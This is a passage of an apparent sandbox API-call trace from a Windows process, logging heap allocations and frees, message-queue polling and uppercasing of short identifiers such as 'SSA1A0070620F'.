(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.436] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.436] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.436] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.437] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.437] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0087.437] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0087.438] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.438] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0087.438] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.438] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.438] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.438] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.439] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.439] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0087.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0087.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0087.440] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0087.440] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.440] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0087.441] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0087.441] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.441] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.441] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0087.442] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.442] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.442] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.442] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0087.443] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0087.443] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0087.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.444] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f28 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.444] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0087.444] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 